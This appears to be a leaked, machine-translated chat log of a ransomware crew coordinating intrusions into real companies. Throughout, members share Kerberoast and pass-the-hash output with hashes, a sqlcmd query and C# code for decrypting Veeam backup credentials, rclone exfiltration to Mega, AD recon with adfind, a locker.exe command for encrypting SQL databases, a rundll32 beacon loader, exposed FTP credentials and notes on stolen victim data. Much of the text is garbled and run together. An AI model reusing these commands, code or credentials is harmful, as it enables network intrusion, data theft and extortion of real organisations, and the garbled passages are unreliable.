Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: sitefil2.site.site.no
#8> Client: web @ site.site.NO
Server: LDAP/sitefil1.site.no/site.site.no @ site.KUMER
A.NO
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_deleg
ate name_canonicalize
Start Time: 11/3/2020 14:41:28 (local)
End Time: 11/4/2020 0:41:26 (local)
Renew Time: 11/10/2020 14:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: sitefil2.site.site.no
C:\Windows\system32>and the ticket list gives the current user's tickets, I made a kerberoast and got the hash of domain user : $krb5tgs$23$*sqluser$site.site.no$MSSQLSvc/sitefil1.site.site.no:1433*tralalyada not understand a fuck if you for example climbed on the host, where the domain token admin hangs you can steal it and go on with it if I understand your question correctly you can and PTT can not do with this ticket? without an account? sandki) aaaa do itpwd
either on the server in the cob or on the client wherepwd where did it save it didmimikatz kerberos::list /export (the article says it all) klist7 tickets in memory like how to see it? is it in memory? how, I can not export it but the principle is the same
you can export a ticket to memory and get the same .kirby.on the seclab there's a manual how to build a Kirby agartt it's when you already have a pass from the domain admin or other privileged accountpassas ze ticket is a little different http://mediumcom/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257aepretty I gave above 2 links) there is a manual how to do itexport the ticket from memory to diskkak receiving kirbi ?the complexity of the brute force (any) depends on the hash algorithm, the password policy and your brute force capability, if you mean it i missed the point, it's all about ntlmtalking about kerberos hash netbilet - it has an extension .kirbyholdhttp://www.securitylab.ru/analytics/496049.phphttps://ru.wikipedia.org/wiki/Kerberos#%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D1%80%D0%B0%D0%B1%D0%BE%D1%82%D1%8Bhttps://hashcat.net/wiki/doku.php?id=example_hashes
7500 Kerberos 5 AS-REQ Pre-Auth etype 23 $krb5pa$23$user$realm$salt$4e751db65422b2117f7eac7b721932dc8aa0d9966785ecd958f971f622bf5c42dc0c70b532363138363136313233383835
not hash is yes ))) if it is a ticket then how to make .kirbi if it is a ticket and not hash) and then what can be done with this pass, and the ticket? and if it is a ticket then how to make .kirbytam in addition to the service accounts there are also ordinary users, well, there as luck krchto difficulty brute-force ticket depends on what password is on the service account, it may be a generic, or password1 and it's not called "kerberos hash", you brute-force tickets depending on which spn you brute-force, how do you tell13100 Kerberos 5 TGS-REP etype 23 $krb5tgs$23$*user$realm$test/spn*$passes are usually complex or not?but kerberos hashes, it is similar to ntlm2 if there are a bunch of them and simple polzakov then brute-force quite - usually polzakoviki easy passwords put, the admins have more complex than relay and brute-force do not do anything brute-force hardNTLMv2 relay.kirbi not make with him with hash? logged in somewhere and if not brute force it does not apply in any way more yes?[ ](https://stylebrooks.com/group/discussion?msg=yy3FBeoLNKGRZBpze) this is a network hash. it is possible to brute-force hash I mean, if there is hash NTLMv2 with it there is nothing to do except brute-force? you can collect through user's PID. who knows how to use kerberoast hash in the system context?
edr_quey install the pluginSave who has the process name - the names of all major av2 commands from the system and rdp off this fuckin@Shved finally found how to bypass Duo Security
``https://help.duo.com/s/article/1088?language=en_US
``@Air pour the date here
into the generalinsulation.com folder
and let me know how it's done
```
172.82.162.66
admin
3cT26dDrDCwS
ftp 21 port
``but you will write @twinbtsxjckg5tgag3via6wi7irpywl6w2fh66pmwt6zlbf5vlyyvnjjxcad.onion
vampir
BYI245Y52NCndjjYRhRmZaologize and write twinook now I'll give you a new account, we have not a big reorganization Greetings, has anyone run into a Cortex XDR? Some kind of monitoring, like av, blocks everything, any activity on the network. Can bring it down can be how that, cuts down even the white software to close processes. Manually kill the system does not work. Clean dll, exe, psh does not let the rest of it.
if you're paranoid
```
= )there speed is even worse)if paranoid - there is i2p plus considering the fact that the control of a huge number of NODs for the NSA... otherwise in the lagging I don't use torus I don't know what the fuck is the point of installing torus on the output?
after that the speed will not be more than 5mb better the opposite
you can mix and match your purchase - and then your[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=y5tx4nRP8mYKGp7Zb), for example, the input will be your own VPN, and the output will be purchased, the output will be torrent, so it will be harder to find even just your VPN, aypy and of course never sit from home internet and only a modem, + change the whole chain every month and / or after a large payment I'm interested in your opinion)
I saw an article on various vpn, including when you raise your own vpn or buy from some company. So, discussed the investigation of the various structures and the search for a man using a VPN from any fee office, the structure may apply to this office to provide a VPN (which allegedly does not see the log), to pay her or under some other pretext to get your ip connection. Discussed the same creation of its VPN, but the question is, when we raise your VPN, we also take a service that prevents the same structures find out from which service the IP VPN and do the same thing as a paid office that provides a VPN service?) + has already suggested) tupunulbladhoundParni! Hi all! What are the alternatives to UserHunter? Ways to accurately pierce the admin's PC? uH do not help if you delete instance with backups no nu again about asurbackups, if you delete them from the cloud, will they restore or not in the very first in which folder in viam can see jobes))= )pbs)ur welcomehttps://www.vishalon.net/blog/commands-for-using-standalone-7-zip-to-split-and-combine-zip-fileкак make it through a goo understandable, and how to do and can you with 7za console also interested in or if you know how you can archive a folder, say, that when archiving the archive beat into parts by 1gb for example?it would be more convenient to give a number of say, the first 20, then the next and so on and so on. would it work with 7z.exe? just give an example how to archive the first 20 files from the folderbro, how to archive all the folders I know. i am interested in the exact moment of flags, etc. how do i record it correctly? Can anyone suggest how to carefully archive files from the folder in Bicon, but not all, and selectively. say the first 20, then the next, etc., or say based on the weight or letter which begins with the files in the folder. alright, fuck them, the other will switch to a palevnoe, but there as luck would be) Well, small a lot of disk will be loaded, lags ... another thing, if he wants to download some of the files, the speed is also not great there are small files, just their much think lagged strongly will ? )so he has work it locate will start, the network will take a discriminating, please advise whether it will be palevoe to raise a VPN to the bot, climb into the right folder through Explorer and download the files from there, provided that this occurs during working hours ?
i can see all the files in the datastores and do whatever you want, located directly in the panel vime -> fileso, by gut instinct i found it, maybe you need a root pass more enter or in this spirit i can not see how to google, i agree with you, i can't see how i can google it, i agree with you. it should be possible but you also need to delete it because veeamzip is a utility. in short, you can zip it to an archive with a password right through vimeam lolno i'm going to check with the console. it's not a snapshot, it's a replication of veeam exagrid but it uses one fuckin' thing, i've uploaded it above. i think i have this script, i made it up) just doubt that it will give anything, although you can try just erase it is unlikely option, and how to archive i actually do not remember it does not really matter even how we pull the access, i do not know what to do then with these replications on the addyndun i also think so, so i have to fuck my brain with vimopo dns resolves ipi and that's it, reqest timeouts with dk and try to either offe or for farmerd, but the problem is that tech hosts are not available or parser of event logs with cd>what is the script that at dc looks when and in what pc was logged into the username?
userhantere looked it up, there are really creeds like root ****** by https esxi> and you have a wiiim connects to this storage to back it up or to put a backup there?
there's a script that looks up when and on what pc the user was logged in? i also have a question, what to do with these replicas
i remember when i was there, i packed it in an archive with a password, but i can't even fucking sneak the 7z in there, i don't remember how we archived the whole castrated linux thing, all right there's hardware like dell poweredge and there's a raid disk array connected to it, did the servers themselves get into esxi through cc?maybe i won't have to fuck around. you led me to believe that it makes sense to check the domain authorization on the esxi hypervisor i didn't go into the hypervisor. i think so, but i'm more worried about storage. i think it just has a root account in the vim though i will check about the root in gooytes, maybe i fucked up there are also virtual hard drives, replication is flying to esxi storage
the credentials for connecting to it says root ********much i need them you mean there should be root passes to hypervisors too? maybe someone has been in the database and knows where something is there
SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];
```
this line should be changed, because the credentials for the storages are obviously not there ```.
tasklist /v
netstat -ano
Look for MsSQL port by PID in 2 outputs
find where sqlcmd.exe is located
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,found_port -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
option -y0 is mandatory otherwise sqlcmd cuts the output
Then you take this code
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;
namespace Main
{
internal static class Program
{
private static void Decrypt(string b,string a){
if (string.IsNullOrEmpty(a))
{
return;
}
byte[] encryptedData = Convert.FromBase64String(a);
Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine));
return;
}
private static void Main(string[] args)
{
Decrypt("optional username", "here is the hash from the sqlcmd output");
}
}
}
a separate Decrypt function call for each hash
You type c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe veeam.cs
you drop the exe on the server with the veeam and run it
I have a mini-manual here, but I'm not sure if it will work on the storages specifically to the storages and not to the vim panel itself. who had a chance to rip the hypervisor/storages codes out of vim? i remember? https://github.com/tnpitsecurity/ligolo-ng
Tunneling, better than socks, uses tun interface! what is kana? in the kana which you addedprilovet I'll raschbiruyutsya that network without delavsya hello thereperesnimi it tomorrow look at?? scanner to look for cars all hello.
Perhaps the topic was raised, if someone has solved it - write in person, please.
When connecting to Fortica in `ipconfig /all ` gives google DNS records.
Next is not clear how to scan the grid, what would at least somewhere to get through.The keylogger esxi was sent for fixing, do not use it yet, there is one bottleneck where it can get in the way{"$binary":"8kWjqI0y8R+MNt/Kub61wAPryhMSHUtb9U5HZdyStO1UZFZugftryBYpesOxjRkSHkIpKUfUQ3iZ8Y6PgUMTyD3Pd69Fwo6HuYH0uK2WT5eHdm0Ru8pyrkCPDWs3/WyZRviJGj6MaEHpvu4MqaPipVv8nIczyt2qjBZQY/W/4DkaAmvdGdLlmDQl2V7al69LkGfR6nZrELn0K1CrLtzHO5ubVeLPCR1HzXIUj6qfqSy8D9jL"}{"$binary":"qlY9Yy/uKCOjgjFaDHegKKYKuWCtCV5e4xxcN73o9Y3T1EeAbrKGJELVsZncMlxqppiOlLXDIsWILbkknTxKzZKx6fgducw1SagGWekXyIHQRMk9viX7pzOASl31nvLdTcIF0f6hBro8EF4EL08nY4D/+Jz0INaiE54PZ9s+TcmUpeXxHf6CDZGjoX+ZpIBgqRANdMydjWhAgYEqfvaI1"}{"$binary""xPACqYgFfTMW286bcFZjKwwFOzc9DMCuywe1mtRataDIZEf6cI2BsEX6eClML8xkzpgVRsx5o1bg7wBrz9VtvrAz2RPRjwPpZ1N8ijcGR/idLDAUpsv6EPHjJMKt4CdWZcriyFj1d9nqz/yQOTZ7sp4F/8W3nzqy1mIzTaecw+z247sVv3mQTDb7QSVahenetbKpXtM9QYaEgav1Bih9LlsVZhUqAuTggtZMs9t4FQ=="}{"$binary":"LrqENVpIrVsphbKn+Qnm6ZoLgeO0/VgmGzo1QrHjJeFnlHlUNHWfxozW3m9uRGVSHnYH1wZKqV7yMg9/uVC/XqUGaF3zgdIKJpi5gvsQ0VNS5wmwjG/TsiJSrA8AKMyiiaAMivi5oZGtYecTKOFGh7h+F2M+cyKsGRy0l8uHs0SfAOkvID0vPmR9zbFdOez9L1+P6FHWsCVh+JoYyQ2aBV6rWn0CM7uzHY1t0HNU0A=="}приветуведомления with text text appears in the chat, and the chat does not show shit and is displayed as unreadCheck for connectionTo do a profile search for wusaRemind me please, how to fix it in cobalt?```
[-] could not spawn C:\Windows\system32\wusa.exe: 740
``like redirecting from local to domain, try domainnextcreditsmaybe someone has encountered this issue...
need to remotely enable port 3389 RDP on the LA (local admin)guys who encountered such a message? what is it in general and how to bypass@all d-box.com - whose fortik
@all groupemontoni.com - whose fort?
I repeat! execute-assemblyhttps://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogonвсем hello, does anyone have instructions on zerologon and proxilogon? who has encountered this error?
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 5.199.174.223:4444
[-] 172.31.30.188:445 - Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Enable ForceExploit to override check result.
This is the first time I've had such a mess and problems ¯\\(ツ)_/¯or for example the 3rd issue, we have two hosts, one of which was mentioned above and everything runs fine, let it be host1 and host2 where remote commands can not go through and only go through rip and let it go through the console
For example, let's take a batcher on host2 . So when I go to rndp on host2 and trying to edit / change the text batch or just delete it he writes that I do not have the right to do it (batch file is in the classic programdata) but if I go to host1 and in the file browser to go to \host2\C$\programdata then easily I can delete that batch or copy a new one from host1 did not say the wrong session, I meant the logged in user on the host, about rdp - as an option, try to migrate to the system process, so you after logging off the session did not fall off it is either a bug or a feature) ` `.
>When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rndp and starting the same batnick, for example, everything is started normally.
```
I also met this once, what is it, I do not know, but most likely in the settings ADGod need advice. What can it be ?
The symptoms :
1oe There is an account YES which normally goes everywhere. When trying to execute commands remotely under this account (tried psexec and wmic) gives out "accesses denide" but going by rdp and starting the same batnik for example, everything is started normally.
2o There is a session from this user on one of the hosts where everything works fine when you connect to other hosts by rdp (tried 5-7 hosts) and close the window rdp session, the account is unlogged. Roughly speaking, I can not let the process and close the RDP window, the process will be executed only when the active RDP session.
While on the same host as I pointed out above is not observed.
What can it be? Some tricky settings in the GPO? Why on hrdp I can execute commands and remotely remotely does not work,
On one host the account works fine and closing the RDP window the processes work and on other hosts there is a "logout"
PS Maybe some kind of glitch? I could not in the beginning randomly out of 100+ hosts to choose exactly the one on which all works well do not see#1.done.ohiodominican.eduNashee have access to soks? luks hangloloyalnoda like on injekt it more lesses bitdefender lsass who removed? or how to inject\style the process polozak? have a clipboard grabber? share plz @all groupemontoni.com - whose fortik? @all d-box.com - whose fortiks diskinventory this must be removed from the list but left on the hard
and remove from the drive it from the hardavo you see there from the inventory and from the drive, from the drive as I understand it should? not done in a long time) @all just in farnese, better ask again) who online, remind pliz to completely remove the backup, which button to press, from the inventory or drive (I assume that the drive) spsklient? have anyone who have faced, tell me, RedCloack AV to mimic sizzles?
gentlemen
if someone says so - write to PM
Alexandar Yerminov, aka veger in lss) or those who are there for backup in fact do you try just rdp to go to the server, viam, open the console and enter the creds domain admins?
Guys who found the central server viama (to decrypt), through the proxy server viama, removed the task list of each server, went to all servers that have the process viama
1. the server on which the viam console, runs viam services but does not spin skl server
2. on the servers where both you services and sqlservr.exe are running - no port detected by the PID of sqlservr.exe process
help who faced the problem is anyone online?
need help when working with Іssass thanks)[ ](https://stylebrooks.com/group/general?msg=aLPhGWXPWcNHtJ2g4) it pulls SharpChromium from the guitar, collects all chrome browsers[ ](https://stylebrooks.com/group/general?msg=aLPhGWXPWcNHtJ2g4) there was some sna script from the chinese. pulled it like. from polzak context switch someone pulled passes from microsoft edge via mimic? what command to pull? thanks) take 2 Ubuntu 18.04, watch this video and configure) ``https://www.youtube.com/watch?v=lT1dhfRKPwo
Ubuntu 18.04 !!!``and never been banned,I just googled for this purpose which accepts bits and does not ban for lifting the vpn hello all,advise a good hoster to lift the vpn on the server,thanks in advance)``
Ns5WQ4hUEqxZRO4Ls1WW8wn8K95FKrkEKLxyjXjdwmjb0NpLosviDzW1N1arhNiY
```
look, whose is it? does anyone have a script or a program you can advise? or what kind of logs are you going to clean?
detective it build? has anyone encountered ? put openvpn by script on debian, when connecting client gives error: ``.
2021-08-17 15:49:18 Insufficient key material or header text not found in file '[[INLINE]]'' (0/128/256 bytes found/min/max)
2021-08-17 15:49:18 Exiting due to fatal error
``[ ](https://stylebrooks.com/group/general?msg=uCCqMeZ3oTQAbJX9F) @Tyr@all beep who worked with hashtag, dictionaries. need a little advice, skype sites where you can watch Asian companies rhubarb... On zuminfo almost no one from Asiahttp://github.com/21y4d/nmapAutomatorNew 0-day ;) Better ideas nakidite che present :) Ladies, if any of us, congratulations on the holiday! :) I have not tried it myself) write me back as you turn out please Thank you I'll try everything I understand.
Export-PowerViewCSV - thread-safe CSV append
``````
Export-PowerViewCSV - thread-safe CSV append
Resolve-IPAddress - resolves a hostname to an IP
ConvertTo-SID - converts a given user/group name to a security identifier (SID)
Convert-ADName - converts object names between a variety of formats
ConvertFrom-UACValue - converts a UAC int value to human readable form
Add-RemoteConnection - pseudo "mounts" a connection to a remote path using the specified credential object
Remove-RemoteConnection - destroys a connection created by New-RemoteConnection
Invoke-UserImpersonation - creates a new "runas /netonly" type logon and impersonates the token
Invoke-RevertToSelf - reverts any token impersonation
Get-DomainSPNTicket - request the kerberos ticket for a specified service principal name (SPN)
Invoke-Kerberoast - requests service tickets for kerberoast-able accounts and returns extracted ticket hashes
Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion
``misc functionshttps://academy.hackthebox.eu/course/preview/active-directory-powerview/powerviewsharpview-overview--usage[ ](https://stylebrooks.com/group/discussion?msg=GeticYLfEDdD5Wiz5) this is how? I understand that it's not difficult just somehow never had a chance to get the log from there in a couple of minuteswhy? it's very simple try a miscomany never tried but I will have somewhere in the log you need the root from the server with the cobalt do not know
you can get the log output from sftp in a couple of minutes? and in the console? no way? you can get the log output from sftp baconGod there is a trivial question how to display the result of the command in a txt file when you execute the execute-assembly
The command itself `execute-assembly /root/Desktop/Webwork/SharpView.exe Get-DomainComputer | Get-NetLoggedon `
I tried `execute-assembly /root/Desktop/Webwork/SharpView.exe Get-DomainComputer | Get-NetLoggedon >> C:\file.txt
`execute-assembly /root/Desktop/Webwork/SharpView.exe Get-DomainComputer | Get-NetLoggedon | Out-File -FilePath C:\file.txt -append -force -encoding UTF8`Hmm, not helpful.Got it, thanks, @slice!
@t3chnolog question on your manu with NTDS, tried `Esentutl /p C:\log\ntds.dit` to fix the ntds file, but requests a certain ntdsai.dll, where to get it and where to put? have an interesting and important questionBarracuda Backup Server 490 - but specifically with these gearsanyone has experience with barracuda backups?
anyone got any domain registrar logs sellers?
i have a synology nas in my case. is there a google drive cloud sync enabled, what are the deletion options ? and does google restore deleted drive files ? @all can someone pass the session from a x64 car ? @all friends who are there free and without tasks, beep me in pm not a bet)toulouse by the way is handy)))) and not cna at all, does not integrate directly with coba is it a script ?) https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
you mean this script?)hello everyone, who knows a cna script with these arguments?
>psexec [hostname] [share] [listener]@all write to anyone who needs a session to redo, right in the workplace on this case where you need a freshThe question as above advised through ftp server on the dedicates, filezilla put 5 minutes, then through the clone pull, very surprised speed, 46 gb for an hour and a half did[ ] (https://stylebrooks.com/group/general?msg=5KZsucuYmrv24D8TX) found a version of this. if relevant scribble
5-10mbps really.
onyon back repurposed kekhoroshy analogue) I just rented a server at 32tb and there I download by ftpstalked that the case is limited to the use of mega, there are still some good analogues, preferably with btk payment ?yes, it will take some time to weigh all the same, won't it ?well thank you and that's it) you can somehow use wmik, the syntax would be correct da well, it's too long...see in the last line of the outaptu ``dir /s E:\YouDocs > log.txt
``How do I check the size of a certain folder?
dnscmd /enumzones > AllZones.txt
for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt
` `remember плиз command poll DnS with dk@all who needs 2fa to take over the sonics? now really do if the log will not be then try the user to write it, from whom you start vmikflag -P plug in and add at the end >> C:\stat.logI was just interested in the statistics.
In any case, thank you.@lexman wait, but it's just start and check, without the ability to periodically see the statistics of the upload, as with the flag `-P`, right? I will add, before starting check that the system rights on the remote machine was enough to go to a given diRight, thanks.
The variant with wmic is also interesting, @lexmandaThe whole output will go into session, yes? `shell rclone.exe copy "\\host\F$" mega:/ -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P `all output into session. flag `-P `you use and all or ` --progress `thank you! Yes I will explain in detail, please, or give example?
Perhaps others will also be useful.rklon command put in the baton, run through wmic
it worksGod, is there any way to run rclone from bacon, and then periodically check the progress? https://www1.appliedsystems.com/en-us/resources/videos/applied-csr24/https://portal.csr24.com/ - has anyone come across? stewart can fill a bunch at once a free service for cracking hasheshttp://crackstation.net/sends backups to the cloud, in the account is a pass, but is there an option to get it? as in viamStorageCraft who decrypted the cracks?
SHUT UP AND TAKE ME FULL INFO!111 and 50 rows by 50 rows to query the tablesto watch the database then dump the clere pass will query all the msl servakina based noSpaaahohoro we need the combine to roll up not the fact that there is a webapp, or separately look for this webapp not climesf dump hashioni lie in clereveb the appa "writes" in the base in config[ ](https://stylebrooks.com/group/general?msg=eJuSrgKkk8W7Yumcy) hmmm
well if it's on gitecac i've already said it's a tricky way to do it
more options? yes, where is the target process on the DB server? where are the creeds? msf can dump sa creeds, i think there is a similar solution on the gitaskl management studio involves opening an rd on which you can palp
cobalt session - to catch a detec-tionadoado the easiest and safest option that do not palnutsya usually these crosses are in the configuration of web applications want to pump the manual can and not only her pollingI ask why is it MsSql admin account is of course she has a crosses or what is where as the account is where to get it?so stopsqlcmd under the VPN)hhm on a remote hosta from under the VPN saysqlcmd under the account saaWhat options for polling the database has except
SQL Management Studio
hoisting the session and injection in sqlservr ?@all those without cases - in pm+@all attention everyone, who needs to reset the session SonicWall need to work with today directly - write to the PM thank you I will try it thank youhttp://habr.com/ru/post/441166/
https://www.ise.io/casestudies/password-manager-hacking/кто can do something with the 1Password database?
foreach($line in Get-Content .\file.txt) {
if($line -match $regex){
# Work here
}
}
``in the loop, for examplepowershell Get-WmiObject -Class win32_logicalDisk `-ComputerName IP ` | ft DeviceID, @{Name="Free Disk Space (GB)";e={$_.FreeSpace /1GB}}, @{Name="Total Disk Size (GB)";e={$_.Size /1GB}} -AutoSize
Can someone tell me how to specify the ip address file correctly, so I don't have to type them separated by commas?
tried : `(Get-Content C:\programdata\list.txt)` but it says it's wrong argument
output:
```
#< CLIXML
Get-WmiObject : Cannot validate argument on parameter 'ComputerName'. The argum_x000D__x000A_ent is null or empty. Provide an argument that is not null or empty, and then t_x000D__x000A_ry the command again._x000D__x000A_At line:1 char:54_x000D__x000A_+ Get-WmiObject -Class win32_logicaldisk -ComputerName (Get-Content c:\programd_x000D__x000A_ata ..._x000D__x000A_+ ~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_~~~_x000D__x000A_ + CategoryInfo : InvalidData: (:) [Get-WmiObject], ParameterBindi _x000D__x000A_ ngValidationException_x000D__x000A_ + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.Power _x000D__x000A_ Shell.Commands.GetWmiObjectCommand_x000D__x000A_ _x000D__x000A_
``[ ](https://stylebrooks.com/group/general?msg=S6Z34gLYgcgAwB5Hx) anyone rolled ? let me play :)thxxm ``
adfind.exe -b dc=domain,dc=local -f "(objectcategory=person)" > C:\Programdata\ad\domain\ad_users.txt
adfind.exe -b dc=domain,dc=local -f "objectcategory=computer" > C:\Programdata\ad\domain\ad_computers.txt
adfind.exe -b dc=domain,dc=local -f "(objectcategory=organizationalUnit)" > C:\Programdata\ad\domain\ad_ous.txt
adfind.exe -b dc=domain,dc=local -subnets -f (objectCategory=subnet)> C:\Programdata\ad\domain\subnets.txt
adfind.exe -b dc=domain,dc=local -f "(objectcategory=group)" > C:\Programdata\ad\domain\ad_group.txt
adfind.exe -b dc=domain,dc=local -gcb -sc trustdmp > C:\Programdata\ad\domain\trustdmp.txt
``trustanddmp ``nltest /trusted_domains ``remember the command to poll the trustdmp ? without a crude can be? from yes to one@alter what is the manual to hunt and drag terrabytes!
it's through the S3 repository implemented? o_unreal, alas, there's a battlefield here whose rocket is cooler - and he wins, so we build rockets constantly)so it's not scary) we have everything here and so requires constant support)through any channel of any software in theory there are different ways to play in principle we have someone who writes
put the tz - let's make a simplea it's perl-likehttp://github.com/RhinoSecurityLabs/external_c2_frameworkhttps://www.cobaltstrike.com/help-externalc2https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/не, you do not understand a little
now show the detects well I still do not have time to figure it out - if you have the desire - better to dig in this direction then http://github.com/Und3rf10w/external_c2_framework
like this, but if you are interested - cobalt has external c2 and tacda, a complete framework@all
https://blog.dylan.codes/shad0w/
interesting enough "fresh" framework
if you have time and interest - i recommend to poke around, but viola correctly hinted that you can put the client on the remote with the VPN just[ ](https://stylebrooks.com/group/general?msg=H5q2v6pjgFTsWTMPQ) if you have crones, it's hard to answer, but i do not really understand why you need sox in this chain? why not open a VPN immediately with the right part?Maybe there is some ssh access, where you can clean up with commands.I at least have not seen a two-factor on vmik or psekespopryt try through wmiexec shell open and forti process put out if there Hyper-V mikrosoft at least if you put out the hypervisor but you and all the virtuals it hosts will fall off, no? but let's know
sansp. no time. admin put out the internets on it kerberos tickets for example can be requested to get rights to shared resources this hash machine for SPN you after pth should do stiltoken this process :
```
| PID 17844
| TID 8412
| LSA Process is now R/W
```
which runs under the token you hackypants well if it is a live machine acct should work ... you can also try through the laughs, also should work
cme smb 127.0.0.1 -u TRUCAMTLBK4\$ -H c028fc26ba545c599adbb9b7e26964d1 -d trudeaucorp.como very defensible bekapseven in the brow here admin me worked 100% lm there whatev msf lm:ntlm suyumimik eats ntlm immediately in kobena et understandably) lm:ntlm?ntlm simpler like that śhatakoy should be ntlmc028fc26ba545c599adbb9b7e26964d1:c028fc26ba545c599adbb9b7e26964d1msfom then all bypass everything try - /user:TRUCAMTLBK4\$.salt is what but I may not mimic the correct way ``
beacon> mimikatz sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1 command
[+] host called home, sent: 750703 bytes
[+] received output:
user : TRUCAMTLBK4$
domain : trudeaucorp.com
program : cmd.exe
impers. : no
NTLM : c028fc26ba545c599adbb9b7e26964d1
| PID 17844
| TID 8412
| LSA Process is now R/W
| LUID 1 ; 2572284471 (00000001:9951f237)
\_ msv1_0 - data copy @ 000001CC19EF7DD0 : OK !
\kerberos - data copy @ 000001CC1A834828
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001CC17DA3948 (32) -> null
beacon> shell dir \\\TRUCAMTLBK4\c$
[*] Tasked beacon to run: dir \\\TRUCAMTLBK4\c$
[+] host called home, sent: 51 bytes
[+] received output:
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
``And the ptx how? So give me the hash of the machine and the login in TRUCAMTLBK4\$ format, you can safely stick it into the msf.
admin is very clever about hiding backups.
urgentonasar
have a domain
need access to the machine
will this work and how to get it right
We'll have to dump all the hashes
and try to authenticate with the machine hash
Target is TRUCAMTLBK4
hash
the output is
``9051 TRUCAMTLBK4$ c028fc26ba545c599adbb9b7e26964d1 528384
```
how to shoe the hash \ token to start the machine? command\session at least what is my@all issproduce.co.uk remind someone who has a mesh in work small thismasonry is aware of the problem, they are working on it, when the fix will notify separately and ask for a ficc in #all_manuals there is a manual how to remove the bulk of the tasklist. Look for sqlserv and on these servers, look for local drives and look for .mdf code Yes, , there is such,. The database on the special control is always noticed following bug
We will locate, e.g. servers through Mount, use batch file handler.bat to stop the database and services
Locker
locker.exe -nomutex -m net - size 20 -p \\host\c$
As a result we get the following situation:
The locker goes through the whole disk, but 90% of the time it misses the .mdf file.
C:\Program Files\Microsoft SQL Server\MSSQL12345\Data\database.mdf
At this point, I strongly recommend that everyone pre-create the mass-tasklist and look where the .mdf is and locate the entire folder with the dira above
Lock like this:
```locker.exe -nomutex -m net -size 20 -p "\\host\c$\Program Files\Microsoft SQL Server\MSSQL12345"
```
Removed path MUST be in quotes, because without the quotes will be a syntax error. If everything is OK, the locker almost immediately takes the files into processing and by the date of change it is visible at onceprincezvhhitechTyr@all
https://continews.pro news domain is banned
the replacement https://continews.icuVano@Air give hell here in the new rocket it already is so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do it so do you want to tell all? @all who is that Kulibin who started it from memory, call me back who wrote that you can publish so did you fill it?
https://github.com/djhohnstein/SharpChromium
``````
Usage:
.\SharpChromium.exe arg0 [arg1 arg2 ...]
Arguments:
all - Retrieve all Chromium Cookies, History and Logins.
full - The same as 'all'.
logins - Retrieve all saved credentials that have non-empty passwords.
history - Retrieve user's history with a count of each time the URL was
visited, along with cookies matching those items.
cookies [domain1.com domain2.com] - Retrieve the user's cookies in JSON format.
If domains are passed, then return only
cookies matching those domains. Otherwise,
all cookies are saved into a temp file of
the format ""%TEMP%\$browser-cookies.json"".
``jumping sanctinel there mani did a paleoload today, how's it going? @all there's free access, write to whoever needs it,``tout here.
Fort Scott Munitions, and Fort Scott Christian Learning Center?
```
not our case by any chance? i'll upload it because i can't get into the admin area, i can't get into the tor apparently it's lagging) tell me how to ask for 2 files, not leoni there requested folders listing sent it to you guys there are still pts schmiffed 1.done.generalinsulation.com a lot of data was on the servers? why not rename it) to mail the pts all still tapped there ``generalinsulation.com
7 Servers 117Works
Mega:
Info uploaded to the server
185 gb info
General Insulation Company is an insulation distributor/supplier that stocks and manufactures a wide range of industrial, commercial and fire protection products for the construction market. With an extensive network of strategically located warehouses and manufacturing facilities, General Insulation is uniquely positioned to meet customer needs in a timely manner with products that meet their specific requirements.
Revenue: Couldn't find info
Locker: Conti
Works: Air,Twin,Steven
``Weigh up the disk, go to the file-sharing site where we downloaded all the info ``but I don't know, they've got like 100kkk in revue, that's basically enough so 117 vorks in the net all downloaded everything ``info185 gig@Air pass a couple sessions on the new cobus webroot fuckin' servers have webroot ``there are webroots``?i will pull them to the kobud if its webroute not zagalnufu def on the servers there how many we have and on what server ? and run the locker the best way to get it off the fuck or what else is there ? and defender there offniservers pull in the new kobud any dsotupny voshmi yes pull them the fuck their pings still pinging then task to this batnik ``
@ECHO OFF
rundll32.exe C:\ProgramData\appman.dll,GetStdHandle
``with this kind of text, that is, you create a batch file which you drop with tascomnova1 dllprinethe vorkservices172.22.9.3
172.22.9.18
172.22.9.17
172.22.9.196
172.22.9.9
172.22.9.2
172.22.9.24
